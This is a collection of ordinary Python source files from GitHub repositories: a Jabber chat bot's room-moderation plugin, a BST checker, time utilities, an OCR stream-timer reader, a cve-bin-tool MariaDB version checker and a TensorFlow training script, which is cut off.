save_amuc(groupchat,'akick',exp,reason)\n\t\t\n\t\tif res != '':\n\t\t\treply(type,source,u'Rule added!')\n\t\t\tAKICK_COMP_EXP[groupchat] = compile_re_patt(groupchat,'akick')\n\t\t\t\n\t\t\tnicks = [li for li in GROUPCHATS[groupchat] if GROUPCHATS[groupchat][li]['ishere'] ==
 1]\n\t\t\tjids = [GROUPCHATS[groupchat][li]['jid'].split('/')[0] for li in GROUPCHATS[groupchat] if GROUPCHATS[groupchat][li]['ishere'] == 1]\n\t\t\t\t\t\t\n\t\t\tI = 0\t\t\t\n\t\t\t\t\t\t\n\t\t\twhile I != len(nicks):\n\t\t\t\tset_amuc(groupchat,kick,AKICK_COMP_EXP[groupchat],nicks[I],jids[I])\n\t\t\t\tI += 1\n\t\telse:\n\t\t\treply(type,source,u'Error adding rule!')\n\telif parameters and parameters[1:].isdigit() and parameters[0] == '-':\n\t\tparameters = parameters[1:]\n\t\takreli = show_amuc(groupchat,'akick')\n\t\trenum = int(parameters)\n\t\t\n\t\tif renum > len(akreli) or renum <= 0:\n\t\t\treply(type,source,u'Wrong rule number!')\n\t\t\treturn\n\t\t\n\t\tamucre = akreli[renum-1][0]\n\t\tdres = del_amuc(groupchat,'akick',amucre)\n\t\t\n\t\tif dres != '':\n\t\t\treply(type,source,u'The rule is removed from the list!')\n\t\t\tAKICK_COMP_EXP[groupchat] = compile_re_patt(groupchat,'akick')\n\t\telse:\n\t\t\treply(type,source,u'Unable to delete the rule!')\n\telif parameters and '-' in parameters and len(parameters) == 1:\n\t\tqres = clear_amuc(groupchat,'akick')\n\t\t\n\t\tif qres != '':\n\t\t\trep = u'List of rules akick is cleared!'\n\t\t\tAKICK_COMP_EXP[groupchat] = r''\n\t\telse:\n\t\t\trep = u'Unable to clear the list of akick!'\n\t\t\n\t\treply(type,source,rep)\n\telse:\n\t\takreli = show_amuc(groupchat,'akick')\n\t\trng = range(len(akreli))\n\t\tnakreli = ['%s) %s' % (li+1, akreli[li][0]) for li in rng]\n\t\t\n\t\tif akreli:\n\t\t\trep = u'List of rules akick (total: ' + str(len(nakreli))+ '):\\n' + '\\n'.join(nakreli)\n\t\telse:\n\t\t\trep = u'List of rules akick is empty!'\n\t\t\t\n\t\tif type == 'public':\t\n\t\t\treply(type,source, u'Look in private!')\n\t\t\t\n\t\treply('private',source,rep)\n\ndef handler_amoderator(type, source, parameters):\n\tgroupchat = source[1]\n\t\n\tif not GROUPCHATS.has_key(groupchat):\n\t\treply(type, source, u'This command can only be used in conference!')\n\t\treturn\n\t\n\tglobal AMODER_COMP_EXP\n\t\n\tspltd = split_reason(parameters)\n\texp = spltd[0]\n\treason = spltd[1]\n\t\n\tif parameters and not parameters[1:].isdigit() and len(parameters) != 1:\n\t\tres = save_amuc(groupchat,'amoderator',exp)\n\t\t\n\t\tif res != '':\n\t\t\treply(type,source,u'Rule added!')\n\t\t\tAMODER_COMP_EXP[groupchat] = compile_re_patt(groupchat,'amoderator')\n\t\t\t\n\t\t\tnicks = [li for li in GROUPCHATS[groupchat] if GROUPCHATS[groupchat][li]['ishere'] == 1]\n\t\t\tjids = [GROUPCHATS[groupchat][li]['jid'].split('/')[0] for li in GROUPCHATS[groupchat] if GROUPCHATS[groupchat][li]['ishere'] == 1]\n\t\t\t\t\t\t\n\t\t\tI = 0\t\t\t\n\t\t\t\t\t\t\n\t\t\twhile I != len(nicks):\n\t\t\t\tset_amuc(groupchat,moderator,AMODER_COMP_EXP[groupchat],nicks[I],jids[I])\n\t\t\t\tI += 1\n\t\telse:\n\t\t\treply(type,source,u'Error adding rule!')\n\telif parameters and parameters[1:].isdigit() and parameters[0] == '-':\n\t\tparameters = parameters[1:]\n\t\tamreli = show_amuc(groupchat,'amoderator')\n\t\trenum = int(parameters)\n\t\t\n\t\tif renum > len(amreli) or renum <= 0:\n\t\t\treply(type,source,u'Wrong rule number!')\n\t\t\treturn\n\t\t\n\t\tamucre = amreli[renum-1][0]\n\t\tdres = del_amuc(groupchat,'amoderator',amucre)\n\t\t\n\t\tif dres != '':\n\t\t\treply(type,source,u'The rule is removed from the list!')\n\t\t\tAMODER_COMP_EXP[groupchat] = compile_re_patt(groupchat,'amoderator')\n\t\telse:\n\t\t\treply(type,source,u'Unable to delete the rule!')\n\telif parameters and '-' in parameters and len(parameters) == 1:\n\t\tqres = clear_amuc(groupchat,'amoderator')\n\t\t\n\t\tif qres != '':\n\t\t\trep =
 u'List of rules amoderator is cleared!'\n\t\t\tAMODER_COMP_EXP[groupchat] = r''\n\t\telse:\n\t\t\trep = u'Unable to clear the amoderator list!'\n\t\t\n\t\treply(type,source,rep)\n\telse:\n\t\tamreli = show_amuc(groupchat,'amoderator')\n\t\trng = range(len(amreli))\n\t\tnamreli = ['%s) %s' % (li+1, amreli[li][0]) for li in rng]\n\t\t\n\t\tif amreli:\n\t\t\trep = u'List of rules amoderator (total: ' + str(len(namreli))+ '):\\n' + '\\n'.join(namreli)\n\t\telse:\n\t\t\trep = u'List of rules amoderator is empty!'\t\n\t\t\n\t\tif type == 'public':\t\n\t\t\treply(type,source, u'Look in private!')\n\t\t\t\n\t\treply('private',source,rep)\n\ndef handler_avisitor(type, source, parameters):\n\tgroupchat = source[1]\n\t\n\tif not GROUPCHATS.has_key(groupchat):\n\t\treply(type, source, u'This command can only be used in conference!')\n\t\treturn\n\t\n\tglobal AVISITOR_COMP_EXP\n\t\n\tspltd = split_reason(parameters)\n\texp = spltd[0]\n\treason = spltd[1]\n\t\n\tif parameters and not parameters[1:].isdigit() and len(parameters) != 1:\n\t\tres = save_amuc(groupchat,'avisitor',exp)\n\t\t\n\t\tif res != '':\n\t\t\treply(type,source,u'Rule added!')\n\t\t\tAVISITOR_COMP_EXP[groupchat] = compile_re_patt(groupchat,'avisitor')\n\t\t\t\n\t\t\tnicks = [li for li in GROUPCHATS[groupchat] if GROUPCHATS[groupchat][li]['ishere'] == 1]\n\t\t\tjids = [GROUPCHATS[groupchat][li]['jid'].split('/')[0] for li in GROUPCHATS[groupchat] if GROUPCHATS[groupchat][li]['ishere'] == 1]\n\t\t\t\t\t\t\n\t\t\tI = 0\t\t\t\n\t\t\t\t\t\t\n\t\t\twhile I != len(nicks):\n\t\t\t\tset_amuc(groupchat,visitor,AVISITOR_COMP_EXP[groupchat],nicks[I],jids[I])\n\t\t\t\tI += 1\n\t\telse:\n\t\t\treply(type,source,u'Error adding rule!')\n\telif parameters and parameters[1:].isdigit() and parameters[0] == '-':\n\t\tparameters = parameters[1:]\n\t\tavreli = show_amuc(groupchat,'avisitor')\n\t\trenum = int(parameters)\n\t\t\n\t\tif renum > len(avreli) or renum <= 0:\n\t\t\treply(type,source,u'Wrong rule number!')\n\t\t\treturn\n\t\t\n\t\tamucre = avreli[renum-1][0]\n\t\tdres = del_amuc(groupchat,'avisitor',amucre)\n\t\t\n\t\tif dres != '':\n\t\t\treply(type,source,u'The rule is removed from the list!')\n\t\t\tAVISITOR_COMP_EXP[groupchat] = compile_re_patt(groupchat,'avisitor')\n\t\telse:\n\t\t\treply(type,source,u'Unable to delete the rule!')\n\telif parameters and '-' in parameters and len(parameters) == 1:\n\t\tqres = clear_amuc(groupchat,'avisitor')\n\t\t\n\t\tif qres != '':\n\t\t\trep = u'List of rules avisitor is cleared!'\n\t\t\tAVISITOR_COMP_EXP[groupchat] = r''\n\t\telse:\n\t\t\trep = u'Unable to clear the avisitor list!'\n\t\t\n\t\treply(type,source,rep)\n\telse:\n\t\tavreli = show_amuc(groupchat,'avisitor')\n\t\trng = range(len(avreli))\n\t\tnavreli = ['%s) %s' % (li+1, avreli[li][0]) for li in rng]\n\t\t\n\t\tif avreli:\n\t\t\trep = u'List of rules avisitor (total: ' + str(len(navreli))+ '):\\n' + '\\n'.join(navreli)\n\t\telse:\n\t\t\trep = u'List of rules avisitor is empty!'\t\n\t\t\n\t\tif type == 'public':\t\n\t\t\treply(type,source, u'Look in private!')\n\t\t\t\n\t\treply('private',source,rep)\n\ndef handler_aban(type, source, parameters):\n\tgroupchat = source[1]\n\t\n\tif not GROUPCHATS.has_key(groupchat):\n\t\treply(type, source, u'This command can only be used in conference!')\n\t\treturn\n\t\n\tglobal ABAN_COMP_EXP\n\t\n\tspltd = split_reason(parameters)\n\texp = spltd[0]\n\treason = spltd[1]\n\t\n\tif parameters and not parameters[1:].isdigit() and len(parameters) != 1:\n\t\tres = save_amuc(groupchat,'aban',exp,reason)\n\t\t\n\t\tif res !=
 '':\n\t\t\treply(type,source,u'Rule added!')\n\t\t\tABAN_COMP_EXP[groupchat] = compile_re_patt(groupchat,'aban')\n\t\t\t\n\t\t\tnicks = [li for li in GROUPCHATS[groupchat] if GROUPCHATS[groupchat][li]['ishere'] == 1]\n\t\t\tjids = [GROUPCHATS[groupchat][li]['jid'].split('/')[0] for li in GROUPCHATS[groupchat] if GROUPCHATS[groupchat][li]['ishere'] == 1]\n\t\t\t\t\t\t\n\t\t\tI = 0\t\t\t\n\t\t\t\t\t\t\n\t\t\twhile I != len(nicks):\n\t\t\t\tset_amuc(groupchat,ban,ABAN_COMP_EXP[groupchat],nicks[I],jids[I])\n\t\t\t\tI += 1\n\t\telse:\n\t\t\treply(type,source,u'Error adding rule!')\n\telif parameters and parameters[1:].isdigit() and parameters[0] == '-':\n\t\tparameters = parameters[1:]\n\t\tabreli = show_amuc(groupchat,'aban')\n\t\trenum = int(parameters)\n\t\t\n\t\tif renum > len(abreli) or renum <= 0:\n\t\t\treply(type,source,u'Wrong rule number!')\n\t\t\treturn\n\t\t\n\t\tamucre = abreli[renum-1][0]\n\t\tdres = del_amuc(groupchat,'aban',amucre)\n\t\t\n\t\tif dres != '':\n\t\t\treply(type,source,u'The rule is removed from the list!')\n\t\t\tABAN_COMP_EXP[groupchat] = compile_re_patt(groupchat,'aban')\n\t\telse:\n\t\t\treply(type,source,u'Unable to delete the rule!')\n\telif parameters and '-' in parameters and len(parameters) == 1:\n\t\tqres = clear_amuc(groupchat,'aban')\n\t\t\n\t\tif qres != '':\n\t\t\trep = u'List of rules aban is cleared!'\n\t\t\tABAN_COMP_EXP[groupchat] = r''\n\t\telse:\n\t\t\trep = u'Unable to clear the aban list!'\n\t\t\n\t\treply(type,source,rep)\n\telse:\n\t\tabreli = show_amuc(groupchat,'aban')\n\t\trng = range(len(abreli))\n\t\tnabreli = ['%s) %s' % (li+1, abreli[li][0]) for li in rng]\n\t\t\n\t\tif abreli:\n\t\t\trep = u'List of rules aban (total: ' + str(len(nabreli))+ '):\\n' + '\\n'.join(nabreli)\n\t\telse:\n\t\t\trep = u'List of rules aban is empty!'\t\n\t\t\n\t\tif type == 'public':\t\n\t\t\treply(type,source, u'Look in private!')\n\t\t\t\n\t\treply('private',source,rep)\n\ndef handler_set_subject(type, source, parameters):\n\tgroupchat = source[1]\n\t\n\tif not GROUPCHATS.has_key(groupchat):\n\t\treply(type, source, u'This command can only be used in conference!')\n\t\treturn\n\t\n\tif parameters:\n\t\tresp = set_subject(groupchat, parameters)\n\t\t\n\t\tif resp:\n\t\t\treply(type, source, u'Done!')\n\t\telse:\n\t\t\treply(type, source, u'Unable to change the subject!')\n\telse:\n\t\treply(type, source, u'And, then?')\n\t\ndef handler_kick(type, source, parameters):\n\tgroupchat=source[1]\n\t\n\tif not GROUPCHATS.has_key(groupchat):\n\t\treply(type, source, u'This command can only be used in conference!')\n\t\treturn\n\t\n\tif parameters:\n\t\tmuc_set_role(kick,type,source,parameters)\n\telse:\n\t\treply(type, source, u'And, who?')\n\t\ndef handler_ban(type, source, parameters):\n\tgroupchat = source[1]\n\t\n\tif not GROUPCHATS.has_key(groupchat):\n\t\treply(type, source, u'This command can only be used in conference!')\n\t\treturn\n\t\n\tif parameters:\n\t\tmuc_set_aff(ban,type,source,parameters)\t\n\telse:\n\t\treply(type, source, u'And, who?')\n\t\ndef handler_none(type, source, parameters):\n\tgroupchat=source[1]\n\t\n\tif not GROUPCHATS.has_key(groupchat):\n\t\treply(type, source, u'This command can only be used in conference!')\n\t\treturn\n\t\n\tif parameters:\n\t\tmuc_set_aff(none,type,source,parameters)\n\telse:\n\t\treply(type, source, u'And, who?')\n\t\ndef handler_member(type, source, parameters):\n\tgroupchat=source[1]\n\n\tif not GROUPCHATS.has_key(groupchat):\n\t\treply(type, source, u'This command can only be used in conference!')\n\t\treturn\n\n\tif
 parameters:\n\t\tmuc_set_aff(member,type,source,parameters)\n\telse: \n\t\treply(type, source, u'And, who?')\n\t\ndef handler_admin(type, source, parameters):\n\tgroupchat=source[1]\n\t\n\tif not GROUPCHATS.has_key(groupchat):\n\t\treply(type, source, u'This command can only be used in conference!')\n\t\treturn\n\t\n\tif parameters:\n\t\tmuc_set_aff(admin,type,source,parameters)\n\telse: \n\t\treply(type, source, u'And, who?')\n\t\ndef handler_owner(type, source, parameters):\n\tgroupchat=source[1]\n\t\n\tif not GROUPCHATS.has_key(groupchat):\n\t\treply(type, source, u'This command can only be used in conference!')\n\t\treturn\n\t\n\tif parameters:\n\t\tmuc_set_aff(owner,type,source,parameters)\n\telse: \n\t\treply(type, source, u'And, who?')\n\ndef handler_moderator(type, source, parameters):\n\tgroupchat=source[1]\n\t\n\tif not GROUPCHATS.has_key(groupchat):\n\t\treply(type, source, u'This command can only be used in conference!')\n\t\treturn\n\t\n\tif parameters:\n\t\tmuc_set_role(moderator,type,source,parameters)\n\telse: \n\t\treply(type, source, u'And, who?')\n\ndef handler_visitor(type, source, parameters):\n\tgroupchat=source[1]\n\t\n\tif not GROUPCHATS.has_key(groupchat):\n\t\treply(type, source, u'This command can only be used in conference!')\n\t\treturn\n\t\n\tif parameters:\n\t\tmuc_set_role(visitor,type,source,parameters)\n\telse: \n\t\treply(type, source, u'And, who?')\n\t\ndef handler_participant(type, source, parameters):\n\tgroupchat=source[1]\n\t\n\tif not GROUPCHATS.has_key(groupchat):\n\t\treply(type, source, u'This command can only be used in conference!')\n\t\treturn\n\t\n\tif parameters:\n\t\tmuc_set_role(participant,type,source,parameters)\n\telse: \n\t\treply(type, source, u'And, who?')\n\t\ndef handler_unban(type, source, parameters):\n\tgroupchat=source[1]\n\t\n\tif not GROUPCHATS.has_key(groupchat):\n\t\treply(type, source, u'This command can only be used in conference!')\n\t\treturn\n\t\n\tif parameters:\n\t\tmuc_set_aff(none,type,source,parameters + '|unban')\n\telse:\n\t\treply(type, source, u'And, who?')\n\t\nregister_command_handler(handler_kick, 'kick', ['admin','all','*','muc'], 16, 'Kick a user!', 'kick ', ['kick guy', 'kick guy|First one out!'])\nregister_command_handler(handler_ban, 'ban', ['admin','all','*','muc'], 20, 'Ban a nick or JID!', 'ban ', ['ban guy', 'ban guy|Get out of here!', 'ban guy@jsmart.web.id', 'ban guy@jsmart.web.id|You are free to go!'])\nregister_command_handler(handler_visitor, 'visitor', ['admin','all','*','muc'], 16, 'Refuse a user the right to speak!', 'visitor ', ['visitor guy'])\nregister_command_handler(handler_participant, 'participant', ['admin','all','*','muc'], 16, 'Returns a user to the default role, i.e. participant!', 'participant ', ['participant guy'])\nregister_command_handler(handler_unban, 'unban', ['admin','all','*','muc'], 20, 'Release a banned JID from quarantine!', 'unban ', ['unban guy@jsmart.web.id!'])\nregister_command_handler(handler_none, 'none', ['admin','all','*','muc'], 20, 'Change a user position to the lowest role!', 'none ', ['none guy'])\nregister_command_handler(handler_member, 'member', ['admin','all','*','muc'], 20, 'Change a user position to a permanent member!', 'member ', ['member guy', 'member guy|Congratulations, be a good member!'])\nregister_command_handler(handler_moderator, 'moderator', ['admin','all','*','muc'], 20, 'Raise a participant or member to interim moderator!', 'moderator ', ['moderator
 guy'])\nregister_command_handler(handler_admin, 'admin', ['superadmin','all','*','muc'], 30, 'Change a user position to conference admin and permanent moderator!', 'admin ', ['admin guy', 'admin guy|Congratulations, now you are admin!'])\nregister_command_handler(handler_owner, 'owner', ['superadmin','all','*','muc'], 30, 'Change a user position to conference owner and permanent moderator!', 'owner ', ['owner guy', 'owner guy|Congratulations, now you are owner!'])\nregister_command_handler(handler_set_subject, 'set_subject', ['admin','all','*','muc'], 16, 'Sets the subject (topic) in the conference!', 'set_subject ', ['set_subject Welcome!'])\nregister_command_handler(handler_akick, 'akick', ['admin','all','*','amuc'], 20, 'Adds a rule to the akick list; it can be any word or regular expression. Without parameters it shows the list of rules. A negative number \"-N\" removes rule N from the list. A bare \"-\" clears the whole list.', 'akick [|reason]', [r'akick .*@jabber\\.ru',r'akick guy',r'akick .*@jabber\\..* | you are not welcome here!',r'akick -3',r'akick -',r'akick'])\nregister_command_handler(handler_amoderator, 'amoderator', ['admin','all','*','amuc'], 20, 'Adds a rule to the amoderator list; it can be any word or regular expression. Without parameters it shows the list of rules. A negative number \"-N\" removes rule N from the list. A bare \"-\" clears the whole list.', 'amoderator ', [r'amoderator .*@jabber\\.ru',r'amoderator guy',r'amoderator -3',r'amoderator -',r'amoderator'])\nregister_command_handler(handler_avisitor, 'avisitor', ['admin','all','*','amuc'], 20, 'Adds a rule to the avisitor list; it can be any word or regular expression. Without parameters it shows the list of rules. A bare \"-\" clears the whole list. A negative number \"-N\" removes rule N from the list.', 'avisitor ', [r'avisitor .*@jabber\\.ru',r'avisitor guy',r'avisitor -3',r'avisitor -',r'avisitor'])\nregister_command_handler(handler_aban, 'aban', ['admin','all','*','amuc'], 20, 'Adds a rule to the aban list; it can be any word or regular expression. Without parameters it shows the list of rules. A negative number \"-N\" removes rule N from the list.
 A bare \"-\" clears the whole list.', 'aban ', [r'aban .*@jabber\\.ru',r'aban guy',r'aban guy | you are not welcome here!',r'aban -3',r'aban -',r'aban'])\n\nregister_stage1_init(get_amuc_state)\nregister_join_handler(handler_amuc_join)\nregister_presence_handler(handler_amuc_presence)","repo_name":"XtremeTeam/Lucy-bot","sub_path":"brain/plugins/muc.py","file_name":"muc.py","file_ext":"py","file_size_in_byte":29391,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"}
{"seq_id":"5874888269","text":"import collections\n\ndef checkBST(tree, curMin=float('-inf'), curMax=float('inf')):\n    if not tree:\n        return True\n    elif not curMin <= tree.data <= curMax:\n        return False\n    else:\n        return checkBST(tree.left, curMin, tree.data) and checkBST(tree.right, tree.data, curMax)\n\ndef checkBSTQueue(tree):\n    QueueEntry = collections.namedtuple('QueueEntry', ('node', 'curMin', 'curMax'))\n\n    bfsQueue = collections.deque([QueueEntry(tree, float('-inf'), float('inf'))])\n\n    while bfsQueue:\n        cur = bfsQueue.popleft()\n        if cur:\n            if not cur.curMin <= cur.node.data <= cur.curMax:\n                return False\n            bfsQueue += [QueueEntry(cur.node.left, cur.curMin, cur.node.data),\n                         QueueEntry(cur.node.right, cur.node.data, cur.curMax)]\n    return True\n","repo_name":"b93901190/PEI_Python","sub_path":"ch14/checkBST.py","file_name":"checkBST.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
{"seq_id":"14824397303","text":"\n\n\n# Compute the difference between two datetimes\nimport datetime\nimport logging\nlogger = logging.getLogger('django')\noneDaySeconds = 86400\n# Get the time difference in seconds\ndef get_date_diff_second(start_str, end_str):\n    start = datetime.datetime.strptime(start_str, '%Y-%m-%d %H:%M:%S')\n    end = datetime.datetime.strptime(end_str, '%Y-%m-%d %H:%M:%S')\n    diff = end - start\n    # days of difference\n    days = diff.days\n    print('days of difference:', diff.days)\n    # seconds of difference\n    seconds = diff.seconds\n    count_seconds = seconds\n    if days > 0:\n        count_seconds = days * oneDaySeconds + seconds\n    print('seconds of difference:', count_seconds)\n    # microseconds of difference\n    # print('microseconds of difference:', diff.microseconds)\n    return count_seconds\n\n\ndef get_time(days=0,seconds=0,hours=0,weeks=0):\n    now_time = datetime.datetime.now()\n    result_time = (now_time + datetime.timedelta(days=days,hours=hours,weeks=weeks,seconds=seconds)).strftime('%Y-%m-%d %H:%M:%S')\n    logger.info(\"Resulting time: %s\" % result_time)\n    print(\"Resulting time: %s\" % result_time)\n    return result_time\n\n\nif __name__ == '__main__':\n    result = get_date_diff_second('2018-11-21 00:00:00','2018-11-21 23:59:59')\n    print(result)\n    # get_time(days=-1)","repo_name":"github4n/AlgorithmServer","sub_path":"utils/timeUtils.py","file_name":"timeUtils.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
{"seq_id":"3202921963","text":"import time\n\n\nclass TimePrinter:\n    \"\"\"Regularly print the current date/time and the passed duration in hours.\"\"\"\n\n    def __init__(self, interval_s: float = 3600.0):\n        \"\"\"Initialise.\n\n        Args:\n            interval_s: Print interval in seconds.\n        \"\"\"\n        #: Print interval in seconds\n        self.interval_s = interval_s\n        #: Timestamp when the printer started\n        self.start_time = time.time()\n        self.start_time_str = time.strftime(\"%F %H:%M\")\n\n        self._last_time_print = 0.0\n\n    def update(self):\n        \"\"\"Print time if the interval_s has passed since the last call.\"\"\"\n        now = time.time()\n        if now - self._last_time_print > self.interval_s:\n
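            # more than interval_s has passed since the last print, so emit a timestamp line\n            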
time_str = time.strftime(\"%F %H:%M\")\n            duration_h = round((now - self.start_time) / 3600)\n            print(\n                \"{} ({} h since {})\".format(\n                    time_str, duration_h, self.start_time_str\n                )\n            )\n            self._last_time_print = now\n","repo_name":"ChrisAFRcrew/robot_fingers","sub_path":"python/robot_fingers/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"38"}
{"seq_id":"71092908271","text":"import cv2\nimport pytesseract\nimport numpy as np\nimport re\n\n# set the tesseract path\npytesseract.pytesseract.tesseract_cmd = './.apt/usr/bin/tesseract'\n\ndef get_timer(img_path):\n    \"\"\"\n    Looks at a screenshot of the stream and finds the timer\n    Uses openCV to make the image easier for tesseract to interpret\n    Tesseract finds the times, returns the timer in a list [minutes, seconds]\n    \"\"\"\n\n    img = cv2.imread(img_path)\n\n    #Crop the image to only look at timer\n    img = img[340:340+50, 1100:1100+130]\n\n    gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n    gray, img_bin = cv2.threshold(gray,128,255,cv2.THRESH_BINARY | cv2.THRESH_OTSU)\n    gray = cv2.bitwise_not(img_bin)\n\n    kernel = np.ones((2, 1), np.uint8)\n    img = cv2.erode(gray, kernel, iterations=1)\n    img = cv2.dilate(img, kernel, iterations=1)\n\n    time_string = pytesseract.image_to_string(img, config='--psm 7 -c tessedit_char_whitelist=0123456789: ').replace('\\f', '').replace('\\n', '')\n    time_list = re.split(':', time_string)\n    \n    #if time contains anything other than numbers, return empty list\n    for time in time_list:\n        if not time.isnumeric():\n            return []\n\n    #timer is only showing seconds, insert 0 minutes at index 0\n    if len(time_list) == 1:\n        time_list.insert(0,0)\n\n    return time_list\n\n\ndef check_dragon(image_path):\n    \"\"\"\n    Returns true if Forsen is fighting the dragon\n    Looks for 'Ender' in 'Ender Dragon' on top of the screen\n    \"\"\"\n\n    #Crop the image to only look at top text\n    img = cv2.imread(image_path)\n    img = img[0:0+24, 560:560+160]\n\n    gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n    gray, img_bin = cv2.threshold(gray,128,255,cv2.THRESH_BINARY | cv2.THRESH_OTSU)\n    gray = cv2.bitwise_not(img_bin)\n\n    kernel = np.ones((2, 1), np.uint8)\n    img = cv2.erode(gray, kernel, iterations=1)\n    img = cv2.dilate(img, kernel, iterations=1)\n\n    dragon_string = pytesseract.image_to_string(img, config='--psm 7').replace('\\f', '').replace('\\n', '')\n    return 'Ender' in dragon_string\n\n\ndef run_ongoing(previous_time, current_time):\n    \"\"\"\n    Returns true if it has been less than 15 minutes since a tweet\n    \"\"\"\n\n    return ((current_time - previous_time) < 900)\n\n\ndef get_seconds(time_list):\n    \"\"\"\n    Takes an array of a timer [minutes, seconds] and returns the total amount of seconds\n    \"\"\"\n\n    minutes = int(time_list[0])\n    seconds = int(time_list[1])\n\n    return (minutes*60 + seconds)\n\n\ndef time_passed(time_array, amount):\n    \"\"\"\n    Checks if a timer has passed a certain amount of time\n    \"\"\"\n\n    time = get_seconds(time_array)\n    return time > get_seconds(amount)\n","repo_name":"erikwessman/forsen-bot","sub_path":"src/run_timer.py","file_name":"run_timer.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
{"seq_id":"15381364498","text":"from cve_bin_tool.checkers import Checker\n\n\nclass MariadbChecker(Checker):\n    CONTAINS_PATTERNS = [\n        r\"Oracle, MariaDB Corporation Ab and others.\",\n        r\"General information about MariaDB can be found 
at\\nhttp://mariadb.org\",\n r\"Welcome to the MariaDB monitor.\",\n r\"MariaDB virtual IO plugin for socket communication\",\n ]\n FILENAME_PATTERNS = [\n r\"mariadb\",\n r\"mariadb-client\",\n r\"mariadb_config\",\n r\"mariadb-client-core\",\n r\"mariadb-test\",\n r\"mariadb-test-data\",\n r\"odbc-mariadb\",\n r\"libmariadb-dev\",\n r\"libmariadb-dev-compat\",\n r\"libmariadb-java\",\n r\"libmariadbclient-dev\",\n r\"mariadb-backup\",\n r\"mariadb-plugin\",\n ]\n VERSION_PATTERNS = [\n r\"([0-9]+\\.[0-9]+\\.[0-9]+)-MariaDB\",\n r\"([0-9]+\\.[0-9]+\\.[0-9]+)\\r?\\nMariaDB\",\n ]\n VENDOR_PRODUCT = [(\"mariadb\", \"mariadb\")]\n","repo_name":"intel/cve-bin-tool","sub_path":"cve_bin_tool/checkers/mariadb.py","file_name":"mariadb.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":950,"dataset":"github-code","pt":"38"} +{"seq_id":"5890380065","text":"import tensorflow as tf\nimport numpy as np\nimport random\nimport os\nimport pprint\nimport models.autoencoder as ae\nimport models.fixed_size_autoencoder as conv_ae\nimport models.gan as gan\nimport models.dcgan_2d as dcgan_2d\nimport models.conv_autoencoder_2d as conv_ae_2d\n\nflags = tf.app.flags\n\nflags.DEFINE_string('experiment_name', 'first_run', 'Name of the experiment being run')\nflags.DEFINE_string('data_dir', None, \"directory where data is stored\")\nflags.DEFINE_string('checkpoint_dir', './saved_checkpoints/', 'Checkpoint directory')\nflags.DEFINE_integer('batch_size', 100, \"The batch size\")\nflags.DEFINE_integer('fixed_len_batch_size', 10, \"The batch size\")\nflags.DEFINE_float('learning_rate', 1e-3, \"The learning rate\")\nflags.DEFINE_float('gpu_usage', 0.96, \"The gpu usage as a percentage\")\nflags.DEFINE_integer('num_epochs', 20, \"The number of epochs to train\")\nflags.DEFINE_boolean(\"recurrent_ae\", False, \"True to use the recurrent AE\")\nflags.DEFINE_boolean(\"gan\", False, \"True to use the gan\")\nflags.DEFINE_boolean(\"conv_ae\", False, \"True to use the conv_ae\")\nflags.DEFINE_string('tag', None, \"Optional tag, attached to checkpoints so runs with different tags have different checkpoints\")\nflags.DEFINE_string(\"best_model_tag\", \"max_val_acc_model\", \"The tag that identifies the directory which the best model is saved to (max_val_acc_model)\")\n\nFLAGS = flags.FLAGS\n\n\ndef main(_):\n pprint.PrettyPrinter().pprint(flags.FLAGS.__flags)\n\n assert FLAGS.data_dir is not None\n FLAG_checkpoint_dir = os.path.join(FLAGS.checkpoint_dir, FLAGS.experiment_name)\n FLAG_log_dir = os.path.join(FLAG_checkpoint_dir, \"logs\", FLAGS.experiment_name)\n\n FLAG_best_model_tag = FLAGS.best_model_tag\n if FLAGS.tag is not None:\n FLAG_best_model_tag = FLAGS.tag + \"_\" + FLAGS.best_model_tag\n \n suffix = \"2d_conv_ae\"\n conv_ae_2d.train_conv_ae(FLAGS.data_dir, FLAGS.experiment_name + suffix, \\\n FLAG_checkpoint_dir + suffix, FLAG_log_dir + suffix, FLAGS.fixed_len_batch_size, \\\n FLAGS.learning_rate, FLAGS.num_epochs, FLAGS.gpu_usage, \\\n FLAGS.tag, FLAG_best_model_tag)\n \n \"\"\"\n suffix = \"_2d_dcgan\"\n dcgan_2d.train_gan(FLAGS.data_dir, FLAGS.experiment_name + suffix, \\\n FLAG_checkpoint_dir + suffix, FLAG_log_dir + suffix, FLAGS.fixed_len_batch_size, \\\n FLAGS.learning_rate, FLAGS.num_epochs, FLAGS.gpu_usage, \\\n FLAGS.tag, FLAG_best_model_tag)\n \"\"\"\n \n if FLAGS.recurrent_ae:\n suffix = \"_ae\"\n ae.train_seq2_seq_ae(FLAGS.data_dir, FLAGS.experiment_name + suffix, \\\n FLAG_checkpoint_dir + suffix, FLAG_log_dir + suffix, FLAGS.batch_size, \\\n 
FLAGS.learning_rate, FLAGS.num_epochs, FLAGS.gpu_usage, \\\n FLAGS.tag, FLAG_best_model_tag)\n \n if FLAGS.conv_ae:\n suffix = \"_conv_ae\"\n conv_ae.train_conv_ae(FLAGS.data_dir, FLAGS.experiment_name + suffix, \\\n FLAG_checkpoint_dir + suffix, FLAG_log_dir + suffix, FLAGS.fixed_len_batch_size, \\\n FLAGS.learning_rate, FLAGS.num_epochs, FLAGS.gpu_usage, \\\n FLAGS.tag, FLAG_best_model_tag)\n \n if FLAGS.gan:\n suffix = \"_gan\"\n gan.train_gan(FLAGS.data_dir, FLAGS.experiment_name + suffix, \\\n FLAG_checkpoint_dir + suffix, FLAG_log_dir + suffix, FLAGS.fixed_len_batch_size, \\\n FLAGS.learning_rate, FLAGS.num_epochs, FLAGS.gpu_usage, \\\n FLAGS.tag, FLAG_best_model_tag)\n\n\n\nif __name__ == '__main__':\n 